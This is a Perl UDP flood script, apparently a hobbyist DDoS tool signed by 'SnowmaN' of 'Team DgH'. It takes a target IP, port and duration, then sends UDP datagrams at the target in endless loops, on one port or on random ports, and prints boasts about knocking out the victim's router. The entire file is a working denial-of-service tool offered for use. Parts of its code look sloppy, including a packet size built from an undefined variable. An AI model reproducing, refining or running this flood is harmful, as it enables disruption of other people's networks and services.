#!/usr/bin/perl


#########################################################
#                         ''~``                         #
#                        ( o o )                        #
#+------------------.oooO--(_)--Oooo.------------------+#
#|                     DgHBySnowmaN                    |#
#|                    .oooO  Skype: OhSMHSnowmaN       |#
#|                    (   )   Oooo.                    |#
#+---------------------\ (----(   )--------------------+#
#                       \_)    ) /                      #
#                             (_/                       #
#########################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "To initiate a UDP Flood\n";
 printf "perl $0 ip port time\n";
 printf "Coded by SnowmaN\n";
 printf "Team DgH is Running 2015\n";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

print <<EOTEXT;

              _________
            /'        /|
           /         / |_
          /         /  //|
         /_________/  ////|
        |   _ _    | 8o////|
        | /'// )_  |   8///|
        |/ // // ) |   8o///|
        / // // //,|  /  8//|
       / // // /// | /   8//|
      / // // ///__|/    8//|
     /.(_)// /// |       8///|
    (_)' `(_)//| |       8////|___________
   (_) /_\ (_)'| |        8///////////////
   (_) \"/ (_)'|_|         8/////////////
    (_)._.(_) d' Hb         8oooooooopb'
      `(_)'  d'  H`b
            d'   `b`b
           d'     H `b
          d'      `b `b
         d'           `b
        d'             `b
        
        
EOTEXT
print <<EOTEXT;
                 .:: DDoS Attack Sent Successfully ::.
               DgH By SnowmaN On Port 53 Random. Get @ Me.


EOTEXT
printf "~SnowmaN RuNz Your Modem/Router!~ $ip on port $port\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}